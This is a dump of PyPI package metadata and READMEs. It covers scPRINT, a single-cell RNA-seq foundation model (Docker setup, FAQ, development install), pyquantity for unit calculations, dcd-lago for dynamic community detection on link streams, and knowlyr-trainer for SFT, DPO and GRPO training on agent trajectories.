[https://www.jkobject.com/scPRINT/](https://cantinilab.github.io/scPRINT)
## Docker
By using the `scPRINT Docker image`, you can bypass the complexities of manual
package installation, ensuring a consistent deployment environment. Included in
this repository is a Dockerfile that lets you craft a container for the project;
you have the choice to either build this image on your own or conveniently pull
it from Docker Hub.
Make sure that you have the `docker` command line interface installed on your
system.
A recommended way to install docker with the correct nvidia drivers on linux is
to use this
[script](https://gist.github.com/xueerchen1990/baad7baa545cb547e8633bc9e5b84786)
/!\ A more up-to-date Docker image is built as part of the open-problems
benchmark and is available in their GitHub for all tasks where scPRINT is
benchmarked.
### Simple tests:
An installation of scPRINT and a simple test of the denoiser are performed on
each commit to the main branch with a
[Github action](https://github.com/cantinilab/scPRINT/actions) and
[pytest workflow](.github/workflows/main.yml). This also provides an expected
runtime for installing and running scPRINT.
We now explore the different usages of scPRINT:
## FAQ
### I have a dataset and want a quick analysis:
-> use [superbio](#try-scprint-in-superbioai)
### I have a dataset and want some more control over what is going on and which model to use:
you will need to understand a few things like lamindb, scdataloader and
scprint's inference tool.
-> start with a quick intro using the
[google collab notebook](#try-scprint-on-a-google-colab-notebook)
-> look at the other FAQ element based on your desired use-case
### What does my anndata need to contain to be run with scPRINT
-> Your anndata only needs to contain the species ontology id in its
obs['organism_ontology_term_id'] (e.g. "NCBITaxon:9606"). It also needs
.var_names (or .var.index) with gene ids given as ENSEMBL IDs or HUGO
symbols.
-> That's it. you can then follow the preprocessing steps from various example
notebooks to align your anndata to our gene set, make sure that it fits our
requirements and then send it to the model!
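As a rough sketch of those two checks in plain Python (a dict stands in for the AnnData fields; the helper name `check_scprint_input` is hypothetical, not part of scPRINT's API):

```python
# Minimal sketch: check the two scPRINT input requirements described above.
# `adata_like` is a plain dict standing in for an AnnData object; the helper
# name `check_scprint_input` is hypothetical, not part of the scPRINT API.
def check_scprint_input(adata_like: dict) -> list[str]:
    problems = []
    # 1) obs must carry the species ontology id
    organism = adata_like.get("obs", {}).get("organism_ontology_term_id")
    if not (isinstance(organism, str) and organism.startswith("NCBITaxon:")):
        problems.append("missing obs['organism_ontology_term_id'] (e.g. 'NCBITaxon:9606')")
    # 2) var names must be ENSEMBL IDs or HUGO symbols (crude heuristic here)
    var_names = adata_like.get("var_names", [])
    if not var_names:
        problems.append("missing .var_names / .var.index")
    elif not all(n.startswith("ENSG") or n.isupper() for n in var_names):
        problems.append("gene ids should be ENSEMBL IDs or HUGO symbols")
    return problems

ok = {"obs": {"organism_ontology_term_id": "NCBITaxon:9606"},
      "var_names": ["ENSG00000141510", "ENSG00000012048"]}
print(check_scprint_input(ok))  # → []
```

With a real AnnData you would check `adata.obs` and `adata.var_names` instead of dict keys.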
### I want to generate gene networks from scRNAseq data:
-> Refer to the gene network inference section in
[this notebook](./docs/notebooks/cancer_usecase.ipynb).
-> More examples in this notebook
[./notebooks/assessments/bench_omni.ipynb](./notebooks/bench_omni.ipynb).
### I want to generate cell embeddings and cell label predictions from scRNAseq data:
-> Refer to the embeddings and cell annotations section in
[this notebook](./docs/notebooks/cancer_usecase.ipynb).
### I want to denoise my scRNAseq dataset:
-> Refer to the Denoising of B-cell section in
[this notebook](./docs/notebooks/cancer_usecase.ipynb).
-> More examples in our benchmark notebook
[./notebooks/assessments/bench_denoising.ipynb](./notebooks/bench_denoising.ipynb).
### I want to generate an atlas-level embedding
-> Refer to the notebook [nice_umap.ipynb](./figures/nice_umap.ipynb).
### I need to generate gene tokens using pLLMs
When running scPRINT, you have the option to define the gene tokens using
protein language model embeddings of genes. This is done by providing scPRINT,
via the "precpt_gene_emb" parameter, with the path to a parquet file containing
the precomputed embedding for each gene name.
-> To generate this file please refer to the notebook
[generate_gene_embeddings](notebooks/generate_gene_embeddings.ipynb).
### I want to re-train scPRINT from scratch on my own data
-> Refer to the documentation page [pretrain scprint](docs/pretrain.md)
### I want to fine-tune scPRINT on my own data
-> make sure that you have done a few runs of scPRINT's inference, e.g.
[this one](#i-want-to-generate-cell-embeddings-and-cell-label-predictions-from-scrnaseq-data)
-> make sure that you have read the [pretrain scprint](docs/pretrain.md)
documentation
-> re-use the same logic as in the
[scprint-train](notebooks/scprint_train.ipynb) notebook, but apply the necessary
modifications in terms of tasks, learning rate or parameter-efficient
fine-tuning method, if you think you will need it (given the small size of the
model, this is not necessary at all). This is the step where you will get your
hands dirty. You might want to really understand how the model
[collates](https://www.jkobject.com/scDataLoader/collator/) data and
[trains](https://cantinilab.github.io/scPRINT/model/#scprint.model.model.scPrint.training_step).
### how can I find if scPRINT was trained on my data?
If your data is available in cellxgene, scPRINT was likely trained on it.
However, some cells and datasets were dropped due to low data quality, and some
were randomly held out for the validation / test sets.
### can I use scPRINT on other organisms rather than human?
scPRINT has been pretrained on both human and mouse, and can be used on any
organism with a similar gene set. If you want to use scPRINT on very different
organisms, you will need to generate gene embeddings for that organism and
re-train scPRINT.
### how long does scPRINT takes? what kind of resources do I need? (or in alternative: can i run scPRINT locally?)
please look at our supplementary tables in the
[manuscript](https://www.biorxiv.org/content/10.1101/2024.07.29.605556v1)
### I have different scRNASeq batches. Should I integrate my data before running scPRINT?
scPRINT takes raw counts as input, so please don't use integrated data. Just
give the raw counts to scPRINT and it will take care of the rest.
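If you want to sanity-check that your matrix really holds raw counts before sending it in, here is a minimal sketch (plain Python; the helper name is hypothetical, not part of scPRINT):

```python
# Sketch: quick check that a matrix looks like raw counts (nonnegative
# integers), as scPRINT expects. The helper name is hypothetical.
def looks_like_raw_counts(values) -> bool:
    return all(v >= 0 and float(v).is_integer() for row in values for v in row)

print(looks_like_raw_counts([[0, 3, 1], [2, 0, 5]]))     # True
print(looks_like_raw_counts([[0.5, 1.2], [3.0, -1.0]]))  # False (normalized / negative values)
```

On a real AnnData you would run the same test over `adata.X` (densifying a small sample first if it is sparse).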
### where to find the input gene embeddings?
If you think you need the gene embeddings file for loading the model from a
checkpoint, you don't, as the embeddings are also stored in the model weights.
You just need to load the weights like this:
```python
model = scPrint.load_from_checkpoint(
'../../data/temp/last-v1.ckpt',
precpt_gene_emb=None,
)
```
You can also recreate the gene embedding file through
[this notebook](notebooks/generate_gene_embeddings.ipynb). Just call the
functions, and it should recreate the file itself.
The file itself is also available on
[hugging face](https://huggingface.co/jkobject/scPRINT/tree/main)
/!\ Please understand that what I mean by gene embeddings here is the immutable
input gene embeddings encoding the gene names. scPRINT directly takes raw
counts as input and takes care of the embedding on the fly (it does similarly
for a gene's location in the genome).
### I want to extract output gene embeddings from scPRINT
I created a novel task script in
[scprint/tasks/gene_emb.py](scprint/tasks/gene_emb.py) that should work
similarly to the other ones (make sure you understand how they work by running
at least one inference notebook).
### I have an issue with sqlite3
1. Install a newer sqlite module: `uv pip install "pysqlite3-binary>=0.5.2"`
2. Add a sitecustomize.py so Python uses it instead of the stdlib sqlite:
```python
# create in ./scprint1/lib/python3.12/site-packages/sitecustomize.py
import pysqlite3 # noqa: F401
import sys
sys.modules["sqlite3"] = pysqlite3
```
3. Restart your Django process.
This is the fastest path and usually works well for Django.
## Development
### dev install
If you want to use the latest version of scPRINT and work on the code yourself,
use `git clone` and `pip install -e` instead of `pip install`:
```bash
git clone https://github.com/cantinilab/scPRINT
git clone https://github.com/jkobject/scDataLoader
git clone https://github.com/cantinilab/GRnnData
git clone https://github.com/jkobject/benGRN
pip install -e scPRINT[dev]
pip install -e scDataLoader[dev]
pip install -e GRnnData[dev]
pip install -e benGRN[dev]
```
### Reproducibility
**To reproduce the paper, please use the version / tag `1.6.4`; you will have
to git clone the repo to have access to all the pre-training functionalities!**
⚠️ When re-training scPRINT from scratch, by default, every N epochs the
`test()` function will be called. It uses pre-downloaded test dataset paths
(see https://github.com/cantinilab/scPRINT/issues/12). Replace them with your
own paths if you want to use these test functions. The datasets are also made
available on hf.co: https://huggingface.co/jkobject/scPRINT/tree/main
### Building the Docker Image
To build the Docker image from the provided `Dockerfile`, run the following
command from the root directory of this repository:
```bash
docker build -t scprint:latest -f Dockerfile .
```
### Pulling the Docker Image from Docker Hub
If you don't want to build the image yourself, you can pull it directly from
Docker Hub:
```bash
docker pull jkobject/scprint:1.2.0
docker tag jkobject/scprint:1.2.0 scprint:latest
```
### Running the Docker Container
Once you have the image (either by building it or pulling it), you can start a
container with:
```bash
docker run --gpus all --rm -it scprint:latest bash
```
Please note: When running the Docker container, ensure you mount any necessary
folders using the `-v` option to access them inside the container.
### Participate
Read the [CONTRIBUTING.md](CONTRIBUTING.md) file.
Read the
[training runs](https://wandb.ai/ml4ig/scprint_scale/reports/scPRINT-trainings--Vmlldzo4ODIxMjgx?accessToken=80metwx7b08hhourotpskdyaxiflq700xzmzymr6scvkp69agybt79l341tv68hp)
document to know more about how pre-training was performed and its behavior.
The reported code coverage is not accurate, as I am using the command line
interface for now; >50% of the code is covered by my current unit tests.
Acknowledgement:
[python template](https://github.com/rochacbruno/python-project-template)
[laminDB](https://lamin.ai/) [lightning](https://lightning.ai/)
## Work in progress (PR welcomed):
1. remove the triton dependencies
2. add version with additional labels (tissues, age) and organisms (mouse,
zebrafish) and more datasets from cellxgene
3. version with separate transformer blocks for the encoding part of the
bottleneck learning and for the cell embeddings
4. improve classifier to output uncertainties and topK predictions when unsure
5. setup latest lamindb version
Awesome Large Cell Model created by Jeremie Kalfon.
| text/markdown | null | jeremie kalfon <jkobject@gmail.com> | null | null | null | GRN, foundation model, gene regulatory network, large cell model, scPRINT, scRNAseq, transformer | [] | [] | null | null | <3.13,>=3.10 | [] | [] | [] | [
"array-api-compat>=1.9.0",
"attridict>=0.0.9",
"bengrn>=1.3.0",
"biomart>=0.9.0",
"bionty>=1.0.0",
"biopython",
"contourpy>=1.3.1",
"d3graph>=2.5.1",
"docstring-parser>=0.15",
"einops>=0.3.0",
"fair-esm>=0.5.0",
"future>=1.0.0",
"gget>=0.29.1",
"grnndata>=1.1.5",
"gseapy>=1.1.8",
"h5py>=3.12.1",
"huggingface-hub>=0.10.0",
"hydra-core>=1.1.0",
"ipykernel>=6.17.0",
"jsonargparse>=4.0.0",
"lamindb==2.1.1",
"leidenalg>=0.10.0",
"lightning>=2.3.0",
"matplotlib==3.9.3",
"numba>=0.56.0",
"numpy<2.0.0,>=1.24.0",
"owlready2>=0.36",
"pandas>=2.0.0",
"patsy>=0.5.6",
"pynndescent>=0.5.11",
"pytorch-lightning>=2.3.0",
"rich>=10.0.0",
"scdataloader>=2.1.0",
"scib-metrics>=0.1.0",
"scib>=1.0.0",
"scikit-learn==1.6.0",
"scikit-misc>=0.5.0",
"scipy>=1.7.0",
"seaborn>=0.11.0",
"setuptools<=75.8.0,>=58.0.0",
"simpler-flash==1.0.7",
"sparse>=0.15.4",
"supabase>=2.15.0",
"tensorly>=0.6.0",
"torch==2.2.0",
"torchaudio>=0.12.0",
"torchdata>=0.7.1",
"torchmetrics==1.6.0",
"torchtext>=0.13.0",
"torchvision>=0.13.0",
"typeshed-client>=2.0.0",
"urllib3<1.27.0,>=1.26.0",
"wandb>=0.12.0",
"celltypist>=0.1.1; extra == \"dev\"",
"coverage>=7.3.2; extra == \"dev\"",
"datamapplot>=0.4.2; extra == \"dev\"",
"datasets>=3.0.1; extra == \"dev\"",
"gitchangelog>=3.0.4; extra == \"dev\"",
"magic-impute>=3.0.0; extra == \"dev\"",
"mkdocs-git-authors-plugin>=0.4.0; extra == \"dev\"",
"mkdocs-git-revision-date-localized-plugin>=1.0.0; extra == \"dev\"",
"mkdocs-jupyter>=0.2.0; extra == \"dev\"",
"mkdocs>=1.5.3; extra == \"dev\"",
"mkdocstrings-python>=0.10.0; extra == \"dev\"",
"mkdocstrings>=0.22.0; extra == \"dev\"",
"papermill>=2.5.0; extra == \"dev\"",
"pytest-cov>=4.1.0; extra == \"dev\"",
"pytest>=7.4.3; extra == \"dev\"",
"ruff>=0.6.4; extra == \"dev\"",
"triton==2.2.0; extra == \"flash\""
] | [] | [] | [] | [
"repository, https://github.com/jkobject/scPRINT"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:17:04.765576 | scprint-2.3.8.tar.gz | 106,202 | d3/10/0d7afa104c92a6710b437462ebd40e7f1c0f520b69a13de6acbb04b80741/scprint-2.3.8.tar.gz | source | sdist | null | false | b097692c06e913086ed92cc69af9f0b5 | 65e9038fc2753b574e2eb28ae11bb270aeb623fd1b4667ff41f50db139d337df | d3100d7afa104c92a6710b437462ebd40e7f1c0f520b69a13de6acbb04b80741 | MIT | [
"LICENSE"
] | 227 |
2.4 | pyquantity | 0.1.15 | A modern Python package for quantity calculations | # PyQuantity
[](https://github.com/odysseu/pyquantity/actions/workflows/ci.yml)






[](https://github.com/psf/black)
A Python package for quantity calculations with unit support and dimensional analysis.
**Test Coverage**: 
## Features
- Comprehensive unit systems with 60+ base dimensions
- 1000+ derived units including mechanical, electrical, and thermal units
- Full SI prefix support from yocto to yotta
- Contextual measurements with built-in database
- Natural language parsing for quantity extraction
- Advanced physics calculations
- Type hints and comprehensive documentation
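As an aside, the dimensional-analysis idea can be sketched in plain Python (a toy illustration, not pyquantity's actual implementation): a dimension is a map from base dimension to exponent, and multiplying quantities adds the exponents.

```python
from collections import Counter

# Toy sketch of dimensional analysis (NOT pyquantity's implementation):
# a dimension is a map {base dimension: exponent}; multiplying quantities
# adds exponents, and cancelled dimensions drop out.
def multiply_dims(a: dict, b: dict) -> dict:
    out = Counter(a)
    out.update(b)  # Counter.update adds counts, i.e. adds exponents
    return {d: e for d, e in out.items() if e != 0}

length = {"L": 1}
print(multiply_dims(length, length))        # {'L': 2}  (length × length = area)
print(multiply_dims(length, {"L": -1}))     # {}        (dimensionless ratio)
```

This is roughly what happens under the hood when `length * width` above yields an area.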
## Installation
```bash
pip install pyquantity
```
**Requirements:**
- Python 3.10 or higher (mostly following [Python's version support policy](https://devguide.python.org/versions/))
**For Developers:**
```bash
pip install -e ".[dev]"
python test_with_coverage.py
```
## Quick Start
```python
from pyquantity import Quantity, get_measurement, parse_quantity
# Basic quantity operations
length = Quantity(5.0, "meter")
width = Quantity(3.0, "meter")
area = length * width
# Unit conversion
distance = Quantity(1.5, "kilometer")
distance_m = distance.convert("meter")
# Contextual measurements
bath = get_measurement("normal bath")
cup = get_measurement("cup")
cups_in_bath = bath / cup
# Natural language parsing
text = "A car traveling at 120 km/h for 2.5 hours"
quantities = parse_quantity(text)
```
## Documentation
- [Usage Guide](docs/usage_guide.md)
- [Advanced Features](docs/advanced_features.md)
- [API Reference](docs/api_reference.md)
- [Examples](example_usage.py)
## License
MIT License - See [LICENSE](LICENSE) for details.
## Contributing
Contributions are welcome!
| text/markdown | Odysseu | Odysseu <uboucherie1@gmail.com> | null | null | MIT | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | https://github.com/odysseu/pyquantity | null | >=3.10 | [] | [] | [] | [
"black>=26.1.0; extra == \"dev\"",
"isort>=7.0.0; extra == \"dev\"",
"mypy>=1.19.1; extra == \"dev\"",
"pytest>=9.0.2; extra == \"dev\"",
"pytest-cov>=7.0.0; extra == \"dev\"",
"ruff>=0.15.1; extra == \"dev\"",
"build>=1.4.0; extra == \"dev\"",
"sphinx>=7.2.6; extra == \"dev\"",
"furo>=2025.12.19; extra == \"dev\"",
"myst-parser>=5.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/odysseu/pyquantity",
"Documentation, https://github.com/odysseu/pyquantity#readme",
"Repository, https://github.com/odysseu/pyquantity.git",
"Issues, https://github.com/odysseu/pyquantity/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:16:25.629221 | pyquantity-0.1.15.tar.gz | 38,781 | 60/9a/8db92a69a685d396dd60fd78a0b137612a9242ed93f7b8a326b1d8a97459/pyquantity-0.1.15.tar.gz | source | sdist | null | false | 76d794bcdead9f27125d2699d19142dc | 9a660b4b4db91a41fa58f0467a021951f46c7b219c02194e1b6f833d77900977 | 609a8db92a69a685d396dd60fd78a0b137612a9242ed93f7b8a326b1d8a97459 | null | [
"LICENSE"
] | 225 |
2.4 | dcd-lago | 1.0.4 | Python implementation of the LAGO method... | # Dynamic Community Detection: LAGO
**This library is a python implementation of the LAGO method for dynamic community detection on temporal networks.**
### Getting started using pip
```
pip install dcd-lago
```
## Link Streams and Dynamic Communities
The **link stream** (or stream graph) model gives temporal networks **perfect temporal precision** for temporal links (also called edges or interactions).
Community detection is an essential task in static network analysis. It consists in grouping nodes so that there are more edges within groups than between them.
Adapting this task to temporal networks means that groups may evolve over time while remaining consistent.
We call this task **Dynamic Community Detection**.
<div style="text-align: center;">
<img src="img/dcd_example.png" alt="Link Stream example with two dynamic communities" style="display:block; margin:auto;" width="500" />

*Figure 1: Link stream made up of 5 nodes (a, ..., e) with interactions over time represented with vertical dashed lines. Two dynamic communities are displayed in blue and green.*
</div>
**LAGO** (Longitudinal Agglomerative Greedy Optimization) is a method to detect dynamic communities on link streams, inspired by the most widely used community detection methods on static graphs. It is based on greedy optimization of Longitudinal Modularity, an adaptation of the Modularity quality function used for communities on static networks.
## Usage
```python
from lago import LinkStream, lago_communities
```
```python
## Declare time links according to the following format:
# <source node>, <target node>, <time instant>
## Values must be integers
time_links = [
[2, 3, 0],
[0, 1, 2],
[2, 3, 3],
[3, 4, 5],
[2, 3, 6],
[2, 4, 7],
[0, 1, 8],
[1, 2, 9],
[3, 4, 9],
[0, 2, 10],
[1, 2, 11],
[3, 4, 13],
[1, 2, 14],
[2, 4, 16],
[0, 1, 17],
[0, 1, 18],
[2, 3, 18],
[3, 4, 19],
]
```
```python
## Initiate empty temporal network (as a link stream)
my_linkstream = LinkStream()
## Add time links to the link stream
my_linkstream.add_links(time_links)
# NOTE time links can also be imported from txt files with the read_txt() method
## Display linkstream information
print(f"The link stream consists of {my_linkstream.nb_edges} temporal edges (or time links) across {my_linkstream.nb_nodes} nodes and {my_linkstream.network_duration} time steps, of which only {my_linkstream.nb_timesteps} contain activity.")
```
```python
## Compute dynamic communities
dynamic_communities = lago_communities(
my_linkstream,
nb_iter=3, # run LAGO 3 times and return best result
)
# Each dynamic community is represented by a list of (<node>, <time instant>)
print(f"{len(dynamic_communities)} dynamic communities have been found")
```
#### Plot Dynamic Communities
```python
from lago import plot_dynamic_communities
fig = plot_dynamic_communities(
linkstream=my_linkstream,
communities=dynamic_communities,
)
fig.show()
```
#### Compute Longitudinal Modularity Score
```python
from lago import longitudinal_modularity
## Compute Longitudinal Modularity score
## (the higher the better / maximum is 1)
long_mod_score = longitudinal_modularity(
my_linkstream,
dynamic_communities,
)
print(f"Dynamic communities detected on the linkstream have a Longitudinal Modularity score of {long_mod_score} ")
```
## Advanced Parameters
LAGO is a greedy method for optimizing Longitudinal Modularity, a quality function for dynamic communities on temporal networks. Both have many options, which affect both speed and the shape of the communities.
### Longitudinal Modularity
`lex` (Longitudinal Expectation):
Can be either Joint-Membership (JM) or Mean-Membership (MM). From a theoretical standpoint, JM expects dynamic communities to have a very consistent duration of existence, whereas MM allows greater freedom in the temporal evolution of communities. The authors lack perspective on the impact of this choice on real data. Defaults to "MM".
`omega`: Time resolution parameter indicating the required level of community continuity over time. Higher values lead to smoother community changes. Defaults to 2.
### LAGO
`refinement`: In greedy search optimization, a refinement strategy can improve results but increases computation time. Defaults to STEM.
| Refinement | Improvement | Time of execution|
| ----------- | ----------- | --------- |
| None | - | - |
| Single Time Node Movements (STNM) | + | +|
| Single Time Edge Movements (STEM) | ++ | ++ |
`refinement_in`: Whether to apply the refinement strategy within the main optimization loop. If activated, results may be improved, but this requires more computation time. Defaults to True.
`fast_exploration`: A lighter exploration loop. If activated, it significantly reduces execution time but may degrade results. Defaults to True.
## Feedback
LAGO method and the python library are constantly improving. If you have any questions, suggestions or issues, please add them to [GitHub issues](https://github.com/fondationsahar/dynamic_community_detection/issues).
## References
### LAGO Method
[*Discovering Communities in Continuous-Time Temporal Networks by Optimizing L-Modularity*](https://arxiv.org/abs/2510.00741) *(preprint)*
```
@misc{brabant2025discoveringcommunitiescontinuoustimetemporal,
title={Discovering Communities in Continuous-Time Temporal Networks by Optimizing L-Modularity},
author={Victor Brabant and Angela Bonifati and Rémy Cazabet},
year={2025},
eprint={2510.00741},
archivePrefix={arXiv},
primaryClass={cs.SI},
url={https://arxiv.org/abs/2510.00741},
}
```
### Longitudinal Modularity
[*Longitudinal Modularity, a Modularity for Link Streams*](https://rdcu.be/eC5fA)
```
@article{Brabant2025,
title = {Longitudinal modularity, a modularity for link streams},
volume = {14},
ISSN = {2193-1127},
url = {http://dx.doi.org/10.1140/epjds/s13688-025-00529-x},
DOI = {10.1140/epjds/s13688-025-00529-x},
number = {1},
journal = {EPJ Data Science},
publisher = {Springer Science and Business Media LLC},
author = {Brabant, Victor and Asgari, Yasaman and Borgnat, Pierre and Bonifati, Angela and Cazabet, Rémy},
year = {2025},
month = feb
}
```
| text/markdown | null | Victor Brabant <victorbrabant@gmail.com> | null | null | MIT | lago, networks, temporal networks, modularity | [] | [] | null | null | >=3.11 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/fondationsahar/dynamic_community_detection",
"Issues, https://github.com/fondationsahar/dynamic_community_detection/issues"
] | twine/6.1.0 CPython/3.11.11 | 2026-02-20T09:16:24.713292 | dcd_lago-1.0.4.tar.gz | 21,195 | 1b/57/8d1e10589a8c3fb6804eae5f5a45c808c137d615daae77c46278393a5dc7/dcd_lago-1.0.4.tar.gz | source | sdist | null | false | 7af13b0da6f7627a1822f5e49da11c5c | 79aae949a54d1a154085cfcdec9904335571b64c5db80453788a91cd1cefc950 | 1b578d1e10589a8c3fb6804eae5f5a45c808c137d615daae77c46278393a5dc7 | null | [
"LICENSE.txt"
] | 214 |
2.4 | knowlyr-trainer | 0.1.1 | PyTorch-based trainer for Agent trajectory datasets — SFT, DPO, GRPO | # knowlyr-trainer
A pure-PyTorch trainer for Agent trajectories (SFT / DPO / GRPO), seamlessly compatible with datasets exported by `knowlyr-hub`.
**Agent training enhancements**: multi-turn conversation format, observation token masking, step-level reward weighting, long-trajectory chunking, curriculum learning.
## Installation
```bash
pip install knowlyr-trainer
# optional
pip install knowlyr-trainer[peft] # LoRA fine-tuning
pip install knowlyr-trainer[wandb] # wandb logging
pip install knowlyr-trainer[all] # everything
## Quick Start
### CLI
```bash
# SFT training
knowlyr-trainer sft --train-file sft.jsonl --model Qwen/Qwen2.5-Coder-7B
# DPO preference learning
knowlyr-trainer dpo --train-file dpo.jsonl --model ./output/sft/final --beta 0.1
# GRPO group relative policy optimization
knowlyr-trainer grpo --train-file grpo.jsonl --model ./output/sft/final
# Model evaluation
knowlyr-trainer eval --model ./output/sft/final --eval-file eval.jsonl
```
### YAML configuration
```bash
knowlyr-trainer sft --config train_config.yaml
```
```yaml
# train_config.yaml
model_name_or_path: Qwen/Qwen2.5-Coder-7B
train_file: sft_data.jsonl
output_dir: ./output/sft
num_epochs: 3
batch_size: 4
learning_rate: 2e-5
max_length: 4096
bf16: true
use_lora: true
agent_format: true       # enable the multi-turn Agent format
mask_observations: true  # mask observation tokens
step_weighted_loss: true # step-level reward weighting
curriculum: true         # curriculum learning
```
### Python API
```python
from agenttrainer import SFTConfig
from agenttrainer.trainers.sft import SFTTrainer
config = SFTConfig(
model_name_or_path="Qwen/Qwen2.5-Coder-7B",
train_file="sft_data.jsonl",
output_dir="./output",
agent_format=True,
mask_observations=True,
)
trainer = SFTTrainer(config)
trainer.train()
```
## Data Format
Plugs directly into the JSONL files exported by `knowlyr-hub export`:
```bash
knowlyr-hub export --format sft -t trajectories.jsonl -o sft_train.jsonl
knowlyr-hub export --format dpo -t trajectories.jsonl -p preferences.jsonl -o dpo_train.jsonl
knowlyr-hub export --format grpo -t trajectories.jsonl -o grpo_train.jsonl
```
### Enhanced Agent data format
With `agent_format=True`, structured step data is supported:
```json
{
"instruction": "Fix the off-by-one bug in sort function",
"input": "{\"repo\": \"owner/repo\"}",
"steps": [
{"thought": "Read the file", "action": "read_file /sort.py", "observation": "def sort(arr): ...", "reward": 0.7},
{"thought": "Fix the bug", "action": "edit_file /sort.py", "observation": "File edited", "reward": 0.9}
],
"task_id": "task-001",
"reward": 0.85
}
```
Plain-text `response` fields are also accepted (the `Step N: / Thought: / Action: / Observation:` layout is parsed automatically).
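One plausible way to recover structured steps from that flat-text layout is a small regex pass; this is a hedged sketch, and the parser actually shipped in knowlyr-trainer may differ:

```python
import re

# A flat-text `response` in the "Step N: / Thought: / Action: / Observation:"
# layout described above.
response = (
    "Step 1:\nThought: Read the file\nAction: read_file /sort.py\n"
    "Observation: def sort(arr): ...\n"
    "Step 2:\nThought: Fix the bug\nAction: edit_file /sort.py\n"
    "Observation: File edited\n"
)

steps = []
for chunk in re.split(r"Step \d+:\n", response):
    if not chunk.strip():
        continue
    # Collect each labelled line within the step into a dict.
    fields = dict(re.findall(r"(Thought|Action|Observation): (.+)", chunk))
    steps.append({key.lower(): value for key, value in fields.items()})
```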
## Agent Training Enhancements
Beyond standard SFT/DPO/GRPO, six enhancements target long-horizon Agent tasks:
### 1. Multi-turn conversation format (`agent_format`)
Converts a trajectory from flat text into a structured multi-turn conversation:
```
user: Fix the bug in sort.py            ← task description (no loss)
assistant: Thought: Read the file       ← model output (loss ✓)
Action: read_file /sort.py
user: Observation: def sort(arr)...     ← environment feedback (no loss)
assistant: Thought: Fix the comparison  ← model output (loss ✓)
Action: edit_file /sort.py
user: Observation: File edited          ← environment feedback (no loss)
```
### 2. Observation masking (`mask_observations`)
Loss is computed only on the model-generated thought + action tokens; environment observation tokens get `labels=-100`. This keeps the model from learning to predict environment behavior and focuses it on learning to make decisions.
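The masking can be sketched in a few lines of PyTorch. This is a minimal illustration with toy tensors, not the trainer's actual code; the key point is that `ignore_index=-100` drops the observation positions from the loss:

```python
import torch
import torch.nn.functional as F

# Toy batch: 6 token positions over a 10-token vocabulary; positions 2-3
# stand in for environment observation tokens.
torch.manual_seed(0)
logits = torch.randn(1, 6, 10)                 # (batch, seq_len, vocab)
input_ids = torch.tensor([[1, 4, 7, 2, 5, 3]])

labels = input_ids.clone()
labels[0, 2:4] = -100                          # mask the observation span

# cross_entropy skips positions labelled -100, so only the
# model-generated thought/action tokens contribute to the loss.
loss = F.cross_entropy(
    logits.view(-1, logits.size(-1)),
    labels.view(-1),
    ignore_index=-100,
)
```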
### 3. Step-level reward weighting (`step_weighted_loss`)
Uses the step-level process rewards from `knowlyr-reward` to weight the CE loss of each token:
```
loss_token = CE(token) × (step_reward / mean_reward)
```
Good steps get higher weight; poor steps are down-weighted.
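Reproduced with per-token cross-entropy, the formula looks like the sketch below; the tensor shapes and reward values are illustrative assumptions, not the package's internals:

```python
import torch
import torch.nn.functional as F

# 4 token positions, each owned by a step with its own process reward
# (supplied by knowlyr-reward in the real pipeline).
torch.manual_seed(0)
logits = torch.randn(1, 4, 10)
labels = torch.tensor([[1, 4, 7, 2]])
step_rewards = torch.tensor([0.7, 0.7, 0.9, 0.9])  # token -> its step's reward

per_token_ce = F.cross_entropy(
    logits.view(-1, logits.size(-1)), labels.view(-1), reduction="none"
)

# loss_token = CE(token) * (step_reward / mean_reward)
weights = step_rewards / step_rewards.mean()
loss = (per_token_ce * weights).mean()
```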
### 4. Long-trajectory chunking (`chunk_long_trajectories`)
Trajectories exceeding `max_length` are split into multiple training samples at step boundaries. Each chunk contains the task description plus context steps plus the current segment, and is never cut in the middle of a step.
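The split can be sketched as a greedy pass over per-step token counts. The `step_tokens` values and the omission of the task-description prefix are simplifying assumptions; the point is that a step is never divided:

```python
# Greedy chunking at step boundaries: a step is never split, and a new
# chunk starts whenever adding the next step would exceed max_length.
step_tokens = [900, 1200, 800, 1500, 700]  # token count of each step
max_length = 2048

chunks, current, current_len = [], [], 0
for n in step_tokens:
    if current and current_len + n > max_length:
        chunks.append(current)
        current, current_len = [], 0
    current.append(n)
    current_len += n
if current:
    chunks.append(current)
```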
### 5. Curriculum learning (`curriculum`)
Trains progressively from easy (short trajectories / high reward) to hard (long trajectories / low reward):
```yaml
curriculum: true
curriculum_start_ratio: 0.3  # start with the easiest 30% of samples
curriculum_warmup_epochs: 2  # use the full dataset after 2 epochs
```
### 6. Step-level GRPO (`step_level_advantage`)
On top of GRPO's trajectory-level advantage, step rewards provide a further weighting:
```
A_{i,j} = A_trajectory_i × (r_{step_j} / mean(r_steps))
```
Good steps in good trajectories get a larger positive gradient; bad steps in bad trajectories are penalized more heavily.
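As a minimal numeric sketch (made-up group and step rewards, not the trainer's implementation), the combined advantage can be computed as:

```python
import torch

# GRPO's trajectory-level advantage: z-score the rewards within a group.
traj_rewards = torch.tensor([0.9, 0.5, 0.2])
adv_traj = (traj_rewards - traj_rewards.mean()) / (traj_rewards.std() + 1e-8)

# Step-level scaling for trajectory 0:
#   A_{0,j} = A_trajectory_0 * (r_step_j / mean(r_steps))
step_rewards = torch.tensor([0.7, 0.95, 1.0])
adv_steps = adv_traj[0] * (step_rewards / step_rewards.mean())
```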
## Training Methods
| Method | Purpose | Data format | CLI |
|------|------|---------|-----|
| **SFT** | Supervised fine-tuning | instruction/response JSONL | `knowlyr-trainer sft` |
| **DPO** | Preference alignment | prompt/chosen/rejected JSONL | `knowlyr-trainer dpo` |
| **GRPO** | Group relative policy optimization | prompt + multiple trajectories JSONL | `knowlyr-trainer grpo` |
## Feature Matrix
